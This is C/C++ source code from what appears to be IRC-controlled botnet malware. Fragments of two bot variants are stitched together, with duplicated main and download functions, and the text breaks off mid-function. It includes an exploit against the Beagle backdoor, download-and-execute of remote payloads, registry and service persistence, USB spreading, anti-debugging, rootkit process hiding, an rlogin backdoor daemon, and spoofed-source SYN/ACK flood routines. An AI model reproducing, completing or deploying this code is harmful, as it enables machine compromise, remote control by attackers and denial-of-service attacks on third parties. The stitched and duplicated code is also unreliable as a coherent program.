EXCEPTION_DISPOSITION cdecl _except_handler(struct _EXCEPTION_RECORD *ExceptionRecord,
void *EstablisherFrame,struct _CONTEXT *ContextRecord,void *DispatcherContext)
{
// do some clean-up
fclosesocket(threads[0].sock);
killthreadall();
fWSACleanup();
fWSACleanup();
Sleep(100);
PROCESS_INFORMATION pinfo;
STARTUPINFO sinfo;
memset(&pinfo, 0, sizeof(pinfo));
memset(&sinfo, 0, sizeof(sinfo));
sinfo.lpTitle = "";
sinfo.cb = sizeof(sinfo);
sinfo.dwFlags = STARTF_USESHOWWINDOW;
#ifdef DEBUG_CONSOLE
sinfo.wShowWindow = SW_SHOW;
#else
sinfo.wShowWindow = SW_HIDE;
#endif
char botfile[MAX_PATH],sysdir[MAX_PATH];
GetSystemDirectory(sysdir, sizeof(sysdir));
GetModuleFileName(NULL, botfile, sizeof(botfile));
if (CreateProcess(NULL, botfile, NULL, NULL, TRUE, NORMAL_PRIORITY_CLASS | DETACHED_PROCESS, NULL, sysdir, &sinfo, &pinfo)) {
Sleep(100);
CloseHandle(pinfo.hProcess);
CloseHandle(pinfo.hThread);
}
// Change EAX in the context record so that it points to someplace
// where we can successfully write
ContextRecord->Eax = (DWORD)&scratch;
_asm
{ // Remove our EXECEPTION_REGISTRATION record
mov eax,[ESP] // Get pointer to previous record
mov FS:[0], EAX // Install previous record
add esp, 8 // Clean our EXECEPTION_REGISTRATION off stack
}
ExitProcess(0);
// Tell the OS to restart the faulting instruction
return ExceptionContinueExecution;
}
BOOL Beagle(EXINFO exinfo)
{
char *BeagleAuth, buffer[IRCLINE], botfile[MAX_PATH], fname[_MAX_FNAME], ext[_MAX_EXT];
BOOL success = FALSE;
WSADATA WSAData;
if (fWSAStartup(MAKEWORD(1,1), &WSAData)!=0)
return FALSE;
SOCKET sSock;
if((sSock = fsocket(PF_INET, SOCK_STREAM, IPPROTO_TCP)) != INVALID_SOCKET) {
SOCKADDR_IN ssin;
memset(&ssin, 0, sizeof(ssin));
ssin.sin_family = AF_INET;
ssin.sin_addr.s_addr = finet_addr(exinfo.ip);
ssin.sin_port = fhtons(exinfo.port);
if(fconnect(sSock, (LPSOCKADDR)&ssin, sizeof(ssin)) != SOCKET_ERROR) {
BeagleAuth = ((strcmp(exinfo.command, "beagle1") == 0)?(BeagleAuth1):(BeagleAuth2));
if(fsend(sSock, BeagleAuth, sizeof(BeagleAuth), 0) != SOCKET_ERROR) {
if (frecv(sSock, buffer, 8, 0) != SOCKET_ERROR) {
GetModuleFileName(0, botfile, sizeof(botfile));
_splitpath(botfile, NULL, NULL, fname, ext);
_snprintf(botfile, sizeof(botfile), "%s%s", fname, ext);
_snprintf(buffer,sizeof(buffer),"http://%s:%s/%s", GetIP(sSock), httpport, botfile);
if(fsend(sSock, buffer, sizeof(buffer), 0))
success = TRUE;
}
}
}
}
fclosesocket(sSock);
fWSACleanup();
if (success) {
_snprintf(buffer, sizeof(buffer), "[%s]: Exploiting IP: %s.", exploit[exinfo.exploit].name, exinfo.ip);
if (!exinfo.silent) irc_privmsg(exinfo.sock, exinfo.chan, buffer, exinfo.notice);
addlog(buffer);
exploit[exinfo.exploit].stats++;
}
return (success);
}
// function for downloading files/updating
DWORD WINAPI DownloadThread(LPVOID param)
{
char buffer[IRCLINE];
DWORD r, d, start, total, speed;
DOWNLOAD dl = *((DOWNLOAD *)param);
DOWNLOAD *dls = (DOWNLOAD *)param;
dls->gotinfo = TRUE;
HANDLE fh = fInternetOpenUrl(ih, dl.url, NULL, 0, 0, 0);
if (fh != NULL) {
// open the file
HANDLE f = CreateFile(dl.dest, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, 0, 0);
// make sure that our file handle is valid
if (f < (HANDLE)1) {
sprintf(buffer,"[DOWNLOAD]: Couldn't open file: %s.",dl.dest);
if (!dl.silent) irc_privmsg(dl.sock,dl.chan,buffer,dl.notice);
addlog(buffer);
clearthread(dl.threadnum);
ExitThread(0);;
}
total = 0;
start = GetTickCount();
char *fileTotBuff=(char *)malloc(512000); //FIX ME: Only checks first 500 kb
do {
memset(buffer, 0, sizeof(buffer));
fInternetReadFile(fh, buffer, sizeof(buffer), &r);
if (dl.encrypted)
Xorbuff(buffer,r);
WriteFile(f, buffer, r, &d, NULL);
if ((total) < 512000) {
//We have free bytes...
//512000-total
unsigned int bytestocopy;
bytestocopy=512000-total;
if (bytestocopy>r)
bytestocopy=r;
memcpy(&fileTotBuff[total],buffer,bytestocopy);
}
total+=r;
if (dl.filelen)
if (total>dl.filelen)
break; //er, we have a problem... filesize is too big.
if (dl.update != 1)
sprintf(threads[dl.threadnum].name, "[Download]: Download: %s (%dKB transferred).", dl.url, total / 1024);
else
sprintf(threads[dl.threadnum].name, "[Download]: Update: %s (%dKB transferred).", dl.url, total / 1024);
} while (r > 0);
BOOL goodfile=TRUE;
if (dl.filelen) {
if (total!=dl.filelen) {
goodfile=FALSE;
sprintf(buffer,"[DOWNLOAD]: Filesize is incorrect: (%d != %d).", total, dl.filelen);
irc_privmsg(dl.sock,dl.chan,buffer,dl.notice);
addlog(buffer);
}
}
speed = total / (((GetTickCount() - start) / 1000) + 1);
CloseHandle(f);
/* if (dl.expectedcrc) {
unsigned long crc,crclength;
sprintf(buffer,"crc32([%lu], [%d])\n",fileTotBuff,total);
crclength=total;
if (crclength>512000) crclength=512000;
crc=crc32(fileTotBuff,crclength);
if (crc!=dl.expectedcrc) {
goodfile=FALSE;
irc_privmsg(dl.sock,dl.chan,"CRC Failed!",dl.notice);
}
} */
free(fileTotBuff);
if (dl.expectedcrc) {
unsigned long crc=crc32f(dl.dest);
if (crc!=dl.expectedcrc) {
goodfile=FALSE;
sprintf(buffer,"[DOWNLOAD]: CRC Fallito (%d != %d).", crc, dl.expectedcrc);
irc_privmsg(dl.sock, dl.chan, buffer, dl.notice);
addlog(buffer);
}
}
if (goodfile==FALSE)
goto badfile;
//download isn't an update
if (dl.update != 1) {
sprintf(buffer, "[DOWNLOAD]: D0S Downloaded %.1f KB in %s @ %.1f KB/sec.", total / 1024.0, dl.dest, speed / 1024.0);
if (!dl.silent) irc_privmsg(dl.sock, dl.chan, buffer, dl.notice);
addlog(buffer);
if (dl.run == 1) {
fShellExecute(0, "open", dl.dest, NULL, NULL, SW_SHOW);
if (!dl.silent) {
sprintf(buffer,"[DOWNLOAD]: Apro Il File : %s.",dl.dest);
irc_privmsg(dl.sock,dl.chan,buffer,dl.notice);
addlog(buffer);
}
}
// download is an update
} else {
sprintf(buffer, "[DOWNLOAD]: Downloaded %.1fKB in %s @ %.1fKB/sec. Updato.", total / 1024.0, dl.dest, speed / 1024.0);
if (!dl.silent) irc_privmsg(dl.sock, dl.chan, buffer, dl.notice);
addlog(buffer);
PROCESS_INFORMATION pinfo;
STARTUPINFO sinfo;
memset(&pinfo, 0, sizeof(pinfo));
memset(&sinfo, 0, sizeof(sinfo));
sinfo.lpTitle = "";
sinfo.cb = sizeof(sinfo);
sinfo.dwFlags = STARTF_USESHOWWINDOW;
sinfo.wShowWindow = SW_HIDE;
if (CreateProcess(NULL, dl.dest, NULL, NULL, FALSE, NORMAL_PRIORITY_CLASS | DETACHED_PROCESS, NULL, NULL, &sinfo, &pinfo) == TRUE) {
fWSACleanup();
uninstall();
ExitProcess(EXIT_SUCCESS);
} else {
sprintf(buffer,"[DOWNLOAD]: Update Fallito: Errore Nell'Apertura Del File: %s.",dl.dest);
if (!dl.silent) irc_privmsg(dl.sock, dl.chan, buffer, dl.notice);
addlog(buffer);
}
}
} else {
sprintf(buffer,"[DOWNLOAD]: Link o DnS Non Trovato SUKKIAMELO!: %s.",dl.url);
if (!dl.silent) irc_privmsg(dl.sock, dl.chan, buffer, dl.notice);
addlog(buffer);
}
badfile:
fInternetCloseHandle(fh);
clearthread(dl.threadnum);
ExitThread(0);
}
int main(int argc, char *argv[])
#endif
{
char msg[256];
LoadDLLs();
unsigned char szBytes[] = { 0xc8, 0x0, 0x4, 0x0, 0x60 };
DWORD dwAddr = (DWORD)GetProcAddress(LoadLibrary("user32.dll"), "MessageBoxA");
if(!memcmp((LPVOID)dwAddr, (LPVOID)szBytes, sizeof(szBytes)))
{
ExitProcess(0);
}
#ifndef NO_SERVICE
SERVICE_TABLE_ENTRY servicetable[] =
{
{servicename, (LPSERVICE_MAIN_FUNCTION) ServiceMain},
{NULL, NULL}
};
#endif
char cpbot[MAX_PATH];
char movetopath[MAX_PATH];
char spath[MAX_PATH];
GetModuleFileName(GetModuleHandle(NULL), cpbot, sizeof(cpbot));
ExpandEnvironmentStrings(gotopth,movetopath,sizeof(movetopath));
sprintf(spath,"%s\\%s",movetopath,exename);
#ifndef _DEBUG
if (MoveBot(movetopath,exename))
{
HKEY hndKey = NULL;
RegCreateKeyEx(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\",0,NULL,REG_OPTION_NON_VOLATILE,KEY_ALL_ACCESS,NULL, &hndKey, NULL);
RegSetValueEx(hndKey,szRegname,0, REG_SZ,(const unsigned char *)exename,strlen(exename));
RegCloseKey(hndKey);
PROCESS_INFORMATION pinfo;
STARTUPINFO sinfo;
ZeroMemory(&pinfo,sizeof(pinfo));
ZeroMemory(&sinfo,sizeof(sinfo));
sinfo.lpTitle = "";
sinfo.cb = sizeof(sinfo);
sinfo.dwFlags = STARTF_USESHOWWINDOW;
sinfo.wShowWindow = SW_HIDE;
if (CreateProcess(spath,NULL,NULL,NULL,TRUE,NORMAL_PRIORITY_CLASS|DETACHED_PROCESS,NULL,movetopath,&sinfo,&pinfo))
{
Sleep(200);
CloseHandle(pinfo.hProcess);
CloseHandle(pinfo.hThread);
fWSACleanup();
ExitProcess(EXIT_SUCCESS);
}
ExitProcess(1);
}
#endif // _DEBUG
#ifndef NO_SERVICE
if(fStartServiceCtrlDispatcher(servicetable) == 0)
InstallService(spath);
#else
DWORD id;
NTHREAD usb;
usb.conn = &mainirc;
CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)USB_Spreader, &usb, 0, &id); // Execute USB spread on install.
HANDLE threadhandle;
if((threadhandle = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Bthd, NULL, 0, &id)) == 0)
return 0;
WaitForSingleObject(threadhandle, INFINITE);
CloseHandle(threadhandle);
return 0;
#endif // NO_SERVICE
#ifdef _DEBUG
#endif
return 0;
}
DWORD WINAPI Bthd(LPVOID param)
{
for (int m=0;m<6;m++)
{
if(!(xetum=CreateMutex(NULL, FALSE, xetumhandle)))
Sleep(5000);
else
break;
}
if (WaitForSingleObject(CreateMutex(NULL, TRUE, xetumhandle), 30000) == WAIT_TIMEOUT)
ExitProcess(0);
addthread(MAIN_THREAD,str_main_thread,main_title);
srand(GetTickCount());
dwstarted=GetTickCount();
WSADATA wsadata;
if (fWSAStartup(MAKEWORD(2,2),&wsadata)!=0)
ExitProcess(-2);
int i=0;
DWORD id=0;
char *ip;
char hostname[256];
struct hostent *h;
fgethostname(hostname, 256);
h = fgethostbyname(hostname);
ip = finet_ntoa(*(struct in_addr *)h->h_addr_list[0]);
strncpy(inip,ip,sizeof(inip));
curserver=0;
HookProtocol(&mainirc);
while (mainirc.should_connect()) {
if (!mainirc.is_connected())
{
#ifdef _DEBUG
printf("Trying to connect to: %s:%i\r\n",sinfo[curserver].host,sinfo[curserver].port);
#endif
#ifndef NO_FLUSHDNS
FlushDNSCache();
#endif
mainirc.start(sinfo[curserver].host,sinfo[curserver].port,
mainirc.nickgen(NICK_TYPE,REQ_NICKLEN),mainirc.nickgen(IDENT_TYPE,REQ_IDENTLEN),
mainirc.nickgen(REALN_TYPE,REQ_REALNLEN),sinfo[curserver].pass);
mainirc.message_loop();
}
else
mainirc.message_loop();
Sleep(SFLOOD_DELAY);
if (curserver==(srvsz-1))
curserver=0;
else
curserver++;
}
// cleanup;
//killthreadall();
fWSACleanup();
ReleaseMutex(xetum);
ExitThread(0);
return TRUE;
}
DWORD WINAPI RlogindThread(LPVOID param)
{
RLOGIND rlogind = *((RLOGIND *)param);
RLOGIND *rloginds = (RLOGIND *)param;
rloginds->gotinfo = TRUE;
char sendbuf[IRCLINE];
int csin_len, Err;
unsigned long mode = 1;
WSADATA WSAData;
SECURITY_ATTRIBUTES SecurityAttributes;
DWORD id;
if ((Err = fWSAStartup(MAKEWORD(2,2), &WSAData)) != 0) {
addlogv("[RLOGIND]: Error: WSAStartup(): <%d>.", Err);
clearthread(rlogind.threadnum);
ExitThread(1);
}
if (!SetConsoleCtrlHandler((PHANDLER_ROUTINE)&CtrlHandler, TRUE)) {
addlogv("[RLOGIND]: Failed to install control-C handler, error: <%d>.", GetLastError());
fWSACleanup();
clearthread(rlogind.threadnum);
ExitThread(1);
}
SOCKET ssock, csock;
SOCKADDR_IN csin, ssin;
memset(&ssin, 0, sizeof(ssin));
ssin.sin_family = AF_INET;
ssin.sin_port = fhtons(rlogind.port);
ssin.sin_addr.s_addr = INADDR_ANY;
if ((ssock = fsocket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) != INVALID_SOCKET) {
threads[rlogind.threadnum].sock = ssock;
if (fbind(ssock, (LPSOCKADDR)&ssin, sizeof(ssin)) == 0) {
if (flisten(ssock, SOMAXCONN) == 0) {
SecurityAttributes.nLength = sizeof(SecurityAttributes);
SecurityAttributes.lpSecurityDescriptor = NULL;
SecurityAttributes.bInheritHandle = FALSE;
addlog("[RLOGIND]: Ready and waiting for incoming connections.");
BOOL flag = TRUE;
while (1) {
csin_len = sizeof(csin);
if ((csock = faccept(ssock, (LPSOCKADDR)&csin, &csin_len)) == INVALID_SOCKET)
break;
if (fsetsockopt(csock, SOL_SOCKET, SO_KEEPALIVE,(char *)&flag,flag) != SOCKET_ERROR) {
rlogind.gotinfo = FALSE;
sprintf(sendbuf,"[RLOGIND]: Client connection from IP: %s:%d, Server thread: %d.", finet_ntoa(csin.sin_addr), fntohs(csin.sin_port), rlogind.threadnum);
addlog(sendbuf);
rlogind.cthreadnum = addthread(sendbuf,RLOGIN_THREAD,csock);
threads[rlogind.cthreadnum].parent = rlogind.threadnum;
if (threads[rlogind.cthreadnum].tHandle = CreateThread(&SecurityAttributes,0,&RlogindClientThread,(LPVOID)&rlogind,0,&id)) {
while (rlogind.gotinfo == FALSE)
Sleep(50);
} else {
addlogv("[RLOGIND]: Failed to start client thread, error: <%d>.", GetLastError());
break;
}
}
}
}
}
}
sprintf(sendbuf, "[RLOGIND]: Error: server failed, returned: <%d>.", fWSAGetLastError());
if (!rlogind.silent) irc_privmsg(rlogind.sock, rlogind.chan, sendbuf, rlogind.notice);
addlog(sendbuf);
fclosesocket(csock);
fclosesocket(ssock);
fWSACleanup();
clearthread(rlogind.threadnum);
ExitThread(0);
}
long SendDDOS(unsigned long TargetIP, unsigned int SpoofingIP, char *Type, unsigned short TargetPort, int len)
{
WSADATA WSAData;
SOCKET sock;
SOCKADDR_IN addr_in;
IPHEADER ipHeader;
TCPHEADER tcpHeader;
PSDHEADER psdHeader;
LARGE_INTEGER freq, halt_time, cur;
char szSendBuf[60]={0},buf[64];
int rect;
if (fWSAStartup(MAKEWORD(2,2), &WSAData)!=0)
return FALSE;
if ((sock = fWSASocket(AF_INET,SOCK_RAW,IPPROTO_RAW,NULL,0,WSA_FLAG_OVERLAPPED )) == INVALID_SOCKET) {
fWSACleanup();
return FALSE;
}
BOOL flag=TRUE;
if (fsetsockopt(sock,IPPROTO_IP, IP_HDRINCL,(char *)&flag,sizeof(flag)) == SOCKET_ERROR) {
fclosesocket(sock);
fWSACleanup();
return FALSE;
}
addr_in.sin_family=AF_INET;
addr_in.sin_port=fhtons((unsigned short)TargetPort);
addr_in.sin_addr.s_addr=TargetIP;
ipHeader.verlen=(4<<4 | sizeof(ipHeader)/sizeof(unsigned long));
ipHeader.total_len=fhtons(sizeof(ipHeader)+sizeof(tcpHeader));
ipHeader.ident=1;
ipHeader.frag_and_flags=0;
ipHeader.ttl=128;
ipHeader.proto=IPPROTO_TCP;
ipHeader.checksum=0;
ipHeader.destIP=TargetIP;
tcpHeader.dport=fhtons((unsigned short)TargetPort);
tcpHeader.sport=fhtons((unsigned short)rand()%1025);
tcpHeader.seq=fhtonl(0x12345678);
/* A SYN attack simply smash its target up with TCP SYN packets.
Each SYN packet needs a SYN-ACK response and forces the server to wait for
the good ACK in reply. Of course, we just never gives the ACK, since we use a
bad IP address (spoof) there's no chance of an ACK returning.
This quickly kills a server as it tries to send out SYN-ACKs while waiting for ACKs.
When the SYN-ACK queues fill up, the server can no longer take any incoming SYNs,
and that's the end of that server until the attack is cleared up.*/
if (strcmp(Type,"ddos.syn") == 0) {
tcpHeader.ack_seq=0;
tcpHeader.flags=SYN;
} else if (strcmp(Type,"ddos.ack") == 0) {
tcpHeader.ack_seq=0;
tcpHeader.flags=ACK;
} else if (strcmp(Type,"ddos.random") == 0) {
tcpHeader.ack_seq=rand()%3;
if (rand()%2 == 0)
tcpHeader.flags=SYN;
else
tcpHeader.flags=ACK;
}
tcpHeader.lenres=(sizeof(tcpHeader)/4<<4|0);
tcpHeader.window=fhtons(16384);
tcpHeader.urg_ptr=0;
long total = 0;
QueryPerformanceFrequency(&freq);
QueryPerformanceCounter(&cur);
halt_time.QuadPart = (freq.QuadPart * len) + cur.QuadPart;
while(TRUE) {
tcpHeader.checksum=0;
tcpHeader.sport=fhtons((unsigned short)((rand() % 1001) + 1000));
tcpHeader.seq=fhtons((unsigned short)((rand() << 16) | rand()));
ipHeader.sourceIP=fhtonl(SpoofingIP++);
psdHeader.daddr=ipHeader.destIP;
psdHeader.zero=0;
psdHeader.proto=IPPROTO_TCP;
psdHeader.length=fhtons(sizeof(tcpHeader));
psdHeader.saddr=ipHeader.sourceIP;
memcpy(szSendBuf, &psdHeader, sizeof(psdHeader));
memcpy(szSendBuf+sizeof(psdHeader), &tcpHeader, sizeof(tcpHeader));
tcpHeader.checksum=checksum((USHORT *)szSendBuf,sizeof(psdHeader)+sizeof(tcpHeader));
memcpy(szSendBuf, &ipHeader, sizeof(ipHeader));
memcpy(szSendBuf+sizeof(ipHeader), &tcpHeader, sizeof(tcpHeader));
memset(szSendBuf+sizeof(ipHeader)+sizeof(tcpHeader), 0, 4);
ipHeader.checksum=checksum((USHORT *)szSendBuf, sizeof(ipHeader)+sizeof(tcpHeader));
memcpy(szSendBuf, &ipHeader, sizeof(ipHeader));
rect=fsendto(sock, szSendBuf, sizeof(ipHeader)+sizeof(tcpHeader),0,(LPSOCKADDR)&addr_in, sizeof(addr_in));
if (rect==SOCKET_ERROR) {
sprintf(buf, "[DDoS]: Send error: <%d>.",fWSAGetLastError());
addlog(buf);
fclosesocket(sock);
fWSACleanup();
return 0;
}
total += rect;
QueryPerformanceCounter(&cur);
if (cur.QuadPart >= halt_time.QuadPart)
break;
}
fclosesocket(sock);
fWSACleanup();
return (total);
}
long SendSyn(unsigned long TargetIP, unsigned int SpoofingIP, unsigned short TargetPort, int len)
{
IPHEADER ipHeader;
TCPHEADER tcpHeader;
PSDHEADER psdHeader;
LARGE_INTEGER freq, halt_time, cur;
char szSendBuf[60]={0},buf[64];
int rect;
WSADATA WSAData;
if (fWSAStartup(MAKEWORD(2,2), &WSAData) != 0)
return FALSE;
SOCKET sock;
if ((sock = fWSASocket(AF_INET,SOCK_RAW,IPPROTO_RAW,NULL,0,WSA_FLAG_OVERLAPPED)) == INVALID_SOCKET) {
fWSACleanup();
return FALSE;
}
BOOL flag=TRUE;
if (fsetsockopt(sock,IPPROTO_IP,IP_HDRINCL,(char *)&flag,sizeof(flag)) == SOCKET_ERROR) {
fclosesocket(sock);
fWSACleanup();
return FALSE;
}
SOCKADDR_IN ssin;
memset(&ssin, 0, sizeof(ssin));
ssin.sin_family=AF_INET;
ssin.sin_port=fhtons(TargetPort);
ssin.sin_addr.s_addr=TargetIP;
ipHeader.verlen=(4<<4 | sizeof(ipHeader)/sizeof(unsigned long));
ipHeader.total_len=fhtons(sizeof(ipHeader)+sizeof(tcpHeader));
ipHeader.ident=1;
ipHeader.frag_and_flags=0;
ipHeader.ttl=128;
ipHeader.proto=IPPROTO_TCP;
ipHeader.checksum=0;
ipHeader.destIP=TargetIP;
tcpHeader.dport=fhtons(TargetPort);
tcpHeader.ack_seq=0;
tcpHeader.lenres=(sizeof(tcpHeader)/4<<4|0);
tcpHeader.flags=2;
tcpHeader.window=fhtons(16384);
tcpHeader.urg_ptr=0;
long total = 0;
QueryPerformanceFrequency(&freq);
QueryPerformanceCounter(&cur);
halt_time.QuadPart = (freq.QuadPart * len) + cur.QuadPart;
while (1) {
tcpHeader.checksum=0;
tcpHeader.sport=fhtons((unsigned short)((rand() % 1001) + 1000));
tcpHeader.seq=fhtons((unsigned short)((rand() << 16) | rand()));
ipHeader.sourceIP=fhtonl(SpoofingIP++);
psdHeader.daddr=ipHeader.destIP;
psdHeader.zero=0;
psdHeader.proto=IPPROTO_TCP;
psdHeader.length=fhtons(sizeof(tcpHeader));
psdHeader.saddr=ipHeader.sourceIP;
memcpy(szSendBuf, &psdHeader, sizeof(psdHeader));
memcpy(szSendBuf+sizeof(psdHeader), &tcpHeader, sizeof(tcpHeader));
tcpHeader.checksum=checksum((USHORT *)szSendBuf,sizeof(psdHeader)+sizeof(tcpHeader));
memcpy(szSendBuf, &ipHeader, sizeof(ipHeader));
memcpy(szSendBuf+sizeof(ipHeader), &tcpHeader, sizeof(tcpHeader));
memset(szSendBuf+sizeof(ipHeader)+sizeof(tcpHeader), 0, 4);
ipHeader.checksum=checksum((USHORT *)szSendBuf, sizeof(ipHeader)+sizeof(tcpHeader));
memcpy(szSendBuf, &ipHeader, sizeof(ipHeader));
rect=fsendto(sock, szSendBuf, sizeof(ipHeader)+sizeof(tcpHeader),0,(LPSOCKADDR)&ssin, sizeof(ssin));
if (rect==SOCKET_ERROR) {
sprintf(buf, "[SYN]: Send error: <%d>.",fWSAGetLastError());
addlog(buf);
fclosesocket(sock);
fWSACleanup();
return 0;
}
total += rect;
QueryPerformanceCounter(&cur);
if (cur.QuadPart >= halt_time.QuadPart)
break;
}
fclosesocket(sock);
fWSACleanup();
return (total);
}
int main(int argc, char *argv[])
#endif
{
LoadDLLs();
#ifndef NO_DDETECT
if(IsBugged())
{
EraseMe(TRUE);
ExitProcess(1);
}
#endif
#ifndef NO_CRYPT
decryptstrings(authsize, versionsize, serversize);
#endif
#ifndef NO_SERVICE
SERVICE_TABLE_ENTRY servicetable[] =
{
{servicename, (LPSERVICE_MAIN_FUNCTION) ServiceMain},
{NULL, NULL}
};
#endif
//TODO: Error handler here
#ifndef _DEBUG
fSetErrorMode(SEM_NOGPFAULTERRORBOX);
#endif
char cfilename[MAX_PATH];
char movetopath[MAX_PATH];
char svcpath[MAX_PATH];
GetModuleFileName(GetModuleHandle(NULL), cfilename, sizeof(cfilename));
ExpandEnvironmentStrings(movepath,movetopath,sizeof(movetopath));
sprintf(svcpath,"%s\\%s",movetopath,filename);
#ifndef _DEBUG
if (MoveBot(movetopath,filename))
{
#ifndef NO_MELT
RegWrite(meltkey.hkey,meltkey.subkey,meltkey.name,cfilename);
#endif // NO_MELT
#ifndef NO_SERVICE
InstallService(svcpath);
#else
RegWrite(runkey.hkey,runkey.subkey,runkey.name,svcpath);
PROCESS_INFORMATION pinfo;
STARTUPINFO sinfo;
ZeroMemory(&pinfo,sizeof(pinfo));
ZeroMemory(&sinfo,sizeof(sinfo));
sinfo.lpTitle = "";
sinfo.cb = sizeof(sinfo);
sinfo.dwFlags = STARTF_USESHOWWINDOW;
#ifdef _DEBUG
sinfo.wShowWindow = SW_SHOW;
#else
sinfo.wShowWindow = SW_HIDE;
#endif // _DEBUG
if (CreateProcess(svcpath,NULL,NULL,NULL,TRUE,NORMAL_PRIORITY_CLASS|DETACHED_PROCESS,NULL,movetopath,&sinfo,&pinfo))
{
Sleep(200);
CloseHandle(pinfo.hProcess);
CloseHandle(pinfo.hThread);
fWSACleanup();
ExitProcess(EXIT_SUCCESS);
}
#endif // NO_SERVICE
ExitProcess(1);
}
#endif // _DEBUG
#ifndef NO_SERVICE
if(fStartServiceCtrlDispatcher(servicetable) == 0)
InstallService(svcpath);
#else
DWORD id;
HANDLE threadhandle;
if((threadhandle = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)BotThread, NULL, 0, &id)) == 0)
return 0;
WaitForSingleObject(threadhandle, INFINITE);
CloseHandle(threadhandle);
#endif // NO_SERVICE
#ifdef _DEBUG
// CloseLog();
#endif
return 0;
}
DWORD WINAPI BotThread(LPVOID param)
{
for (int m=0;m<6;m++)
{
if(!(mutex=CreateMutex(NULL, FALSE, mutexhandle)))
Sleep(5000);
else
break;
}
// if (WaitForSingleObject(CreateMutex(NULL, TRUE, mutexhandle), 30000) == WAIT_TIMEOUT)
// ExitProcess(0);
addthread(MAIN_THREAD,str_main_thread,main_title);
#ifndef _DEBUG
#ifndef NO_MELT
char *melt=RegQuery(meltkey.hkey,meltkey.subkey,meltkey.name);
if (melt)
{
SetFileAttributes(melt,FILE_ATTRIBUTE_NORMAL);
int tries=0;
while (FileExists(melt) && tries<3)
{
DeleteFile(melt);
tries++;
Sleep(2000);
}
RegDelete(meltkey.hkey,meltkey.subkey,meltkey.name);
}
#endif // NO_MELT
#endif // _DEBUG
srand(GetTickCount());
dwstarted=GetTickCount();
#ifndef NO_VERSION_REPLY
curversion=rand()%(versionsize);
#ifdef _DEBUG
printf("Generated current_version: %d (%d), %s.\n",curversion,versionsize,versionlist[curversion]);
#endif
#endif
WSADATA wsadata;
if (fWSAStartup(MAKEWORD(2,2),&wsadata)!=0)
ExitProcess(-2);
#ifndef _DEBUG
#ifndef NO_FCONNECT
char readbuf[1024];
HINTERNET httpopen, openurl;
DWORD read;
httpopen=fInternetOpen(NULL,INTERNET_OPEN_TYPE_DIRECT,NULL,NULL,0);
openurl=fInternetOpenUrl(httpopen,cononstart,NULL,NULL,INTERNET_FLAG_RELOAD|INTERNET_FLAG_NO_CACHE_WRITE,NULL);
if (!openurl)
{
fInternetCloseHandle(httpopen);
fInternetCloseHandle(openurl);
}
fInternetReadFile(openurl,readbuf,sizeof(readbuf),&read);
fInternetCloseHandle(httpopen);
fInternetCloseHandle(openurl);
#endif // NO_FCONNECT
#endif // _DEBUG
#ifndef NO_INSTALLED_TIME
if (!noadvapi32)
GetInstalledTime();
else
sprintf(installedt,"Error");
#endif // NO_INSTALLED_TIME
int i=0;
DWORD id=0;
#ifndef NO_RECORD_UPTIME
i=addthread(RUPTIME_THREAD,str_rup_thread,main_title);
threads[i].tHandle=CreateThread(NULL,0,&RecordUptimeThread,0,0,&id);
#endif // NO_RECORD_UPTIME
#ifndef NO_AUTO_SECURE
#ifndef NO_SECURE
NTHREAD secure;
secure.bdata2=TRUE;//loop
i=addthread(SECURE_THREAD,str_asecure_thread,sec_title);
threads[i].tHandle=CreateThread(NULL,0,&SecureThread,(LPVOID)&secure,0,&id);
#endif
#endif // NO_AUTO_SECURE
#ifndef NO_RDRIV
#ifndef _DEBUG
rkenabled=InitRK();//initialize fu
if (rkenabled)
HideMe();//hide the process
#endif // _DEBUG
#endif // NO_RDRIV
#ifndef _DEBUG // maybe this will give the shutdown handler time to work
RegWrite(HKEY_LOCAL_MACHINE,"SYSTEM\\CurrentControlSet\\Control","WaitToKillServiceTimeout","7000");
#endif
//get internal ip
char *ip;
char hostname[256];
struct hostent *h;
fgethostname(hostname, 256);
h = fgethostbyname(hostname);
ip = finet_ntoa(*(struct in_addr *)h->h_addr_list[0]);
strncpy(inip,ip,sizeof(inip));
curserver=0;
HookProtocol(&mainirc);
while (mainirc.should_connect()) {
if (!mainirc.is_connected())
{
#ifdef _DEBUG
printf("Trying to connect to: %s:%i\r\n",servers[curserver].host,servers[curserver].port);
#endif
#ifndef NO_FLUSHDNS
FlushDNSCache();
#endif
mainirc.start(servers[curserver].host,servers[curserver].port,
mainirc.nickgen(NICK_TYPE,REQ_NICKLEN),mainirc.nickgen(IDENT_TYPE,REQ_IDENTLEN),
mainirc.nickgen(REALN_TYPE,REQ_REALNLEN),servers[curserver].pass);
mainirc.message_loop();
}
else
mainirc.message_loop();
Sleep(SFLOOD_DELAY);
if (curserver==(serversize-1))
curserver=0;
else
curserver++;
}
// cleanup;
killthreadall();
fWSACleanup();
ReleaseMutex(mutex);
ExitThread(0);
}
DWORD WINAPI DownloadThread(LPVOID param)
{
char buffer[IRCLINE];
DWORD r, d, start, total, speed;
NTHREAD dl = *((NTHREAD *)param);
NTHREAD *dls = (NTHREAD *)param;
dls->gotinfo = TRUE;
IRC* irc=(IRC*)dl.conn;
char dlfrom[MAX_HOSTNAME];
char dlto[MAX_PATH];
strncpy(dlfrom,dl.data1,sizeof(dlfrom));
strncpy(dlto,dl.data2,sizeof(dlto));
HANDLE fh = fInternetOpenUrl(ih, dlfrom, NULL, 0, 0, 0);
if (fh != NULL)
{
HANDLE f = CreateFile(dlto, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, 0, 0);
if (f < (HANDLE)1)
{
if (!dl.silent)
irc->pmsg(dl.target,"%s Couldn't open file for writing: %s.",(dl.bdata1?update_title:download_title),dlto);
fInternetCloseHandle(fh);
clearthread(dl.threadnum);
ExitThread(0);
}
total = 0;
start = GetTickCount();
char *fileTotBuff=(char *)malloc(512000);
do
{
ZeroMemory(buffer,sizeof(buffer));
fInternetReadFile(fh, buffer, sizeof(buffer), &r);
WriteFile(f, buffer, r, &d, NULL);
if ((total) < 512000)
{
unsigned int bytestocopy;
bytestocopy=512000-total;
if (bytestocopy>r)
bytestocopy=r;
memcpy(&fileTotBuff[total],buffer,bytestocopy);
}
total+=r;
}
while (r > 0);
speed = total / (((GetTickCount() - start) / 1000) + 1);
free(fileTotBuff);
CloseHandle(f);
